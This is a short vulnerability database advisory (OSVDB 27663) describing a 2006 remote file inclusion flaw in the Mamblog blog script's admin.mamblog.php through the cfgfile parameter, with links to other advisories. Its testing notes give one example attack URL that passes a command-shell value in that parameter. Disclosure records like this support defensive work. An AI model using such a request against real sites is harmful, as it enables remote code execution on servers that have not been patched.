Mamblog admin.mamblog.php cfgfile Variable Remote File Inclusion

2006-06-13T16:32:48
ID OSVDB:27663
Type osvdb
Reporter OSVDB
Modified 2006-06-13T16:32:48

Description

Manual Testing Notes

http://[target]/Mamblog/admin.mamblog.php?cfgfile=Command-Shell

References:

Vendor URL: http://scripts.ringsworld.com/blog/mamblog-1-0/
Other Advisory URL: http://www.root-security.org/danger/Mamblog.txt
Other Advisory URL: http://www.security.nnov.ru/Ndocument124.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0242.html